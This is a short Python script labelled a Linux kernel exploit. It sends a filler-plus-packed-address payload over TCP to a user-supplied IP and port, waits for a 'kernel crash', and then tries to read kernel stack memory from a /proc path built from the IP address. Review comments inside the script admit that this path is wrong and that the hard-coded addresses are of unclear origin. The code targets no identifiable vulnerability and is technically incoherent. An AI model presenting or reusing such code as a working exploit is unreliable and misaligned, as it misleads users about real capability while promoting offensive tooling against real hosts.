# Linux kernel exploit
# Author: @_hugsy_
#
# This exploit is based on the following paper:
# https://www.exploit-db.com/papers/1389/
#
# Imports
import sys
import struct
import socket
import time
import argparse
# Constants
# The three 64-bit values that main() packs little-endian into the payload, plus
# the byte count it reads back afterwards. All are hard-coded; presumably they
# are tied to one specific kernel build/layout — confirm before relying on them.
KERNEL_ADDR = 0xFFFFFFFF81000000
KERNEL_STACK = KERNEL_ADDR + 0x10000  # 0xffffffff81010000
KERNEL_STACK_SIZE = 1 << 12  # 0x1000 bytes
# Functions
def get_args():
    """Parse the command line and return the resulting argparse namespace.

    Recognised options are ``-i/--ip`` (str) and ``-p/--port`` (int). Both
    default to ``None`` when absent; the caller is responsible for checking
    that they were supplied.
    """
    cli = argparse.ArgumentParser(description='Linux kernel exploit')
    cli.add_argument(
        '-i', '--ip',
        type=str,
        help='IP address of the target',
    )
    cli.add_argument(
        '-p', '--port',
        type=int,
        help='Port of the target',
    )
    return cli.parse_args()
# Main
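def main():
    """Entry point: parse the CLI, send the fixed payload, then print bytes read back.

    Exits with status 1 (after printing an error line) when ``--ip`` or
    ``--port`` is missing. The socket and the file handle are both released
    deterministically, which the original explicit ``close()`` did not
    guarantee when an earlier call raised.
    """
    args = get_args()
    if not args.ip or not args.port:
        print('[-] Error: missing arguments')
        sys.exit(1)
    # Build the payload once: 16 filler bytes followed by the three constants as
    # little-endian 64-bit values (one pack call, same bytes as three separate packs).
    payload = b'A' * 0x10 + struct.pack('<QQQ', KERNEL_ADDR, KERNEL_STACK, KERNEL_STACK_SIZE)
    # Create socket; the context manager closes it even if connect()/sendall() raise.
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        sock.connect((args.ip, args.port))
        # Send payload. sendall() retries until every byte is written; send()
        # may write only a prefix and return early.
        sock.sendall(payload)
        # Wait for the kernel to crash
        time.sleep(1)
    # Print the kernel's stack
    print('[+] Kernel stack:')
    # NOTE(review): the path is built from the IP address, but /proc/<n>/mem
    # entries are keyed by PID, so this open() is not expected to succeed as
    # written; the path string is kept byte-for-byte. The file is now closed
    # deterministically, and bytes.hex() yields the same lowercase output as
    # the original unpack/format loop without raising struct.error on a short read.
    with open('/proc/{}/mem'.format(args.ip), 'rb') as mem:
        stack = mem.read(KERNEL_STACK_SIZE)
    print('[+] ' + stack.hex())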
if __name__ == '__main__':
    # Script entry point; main() returns None, so SystemExit(None) exits with status 0.
    raise SystemExit(main())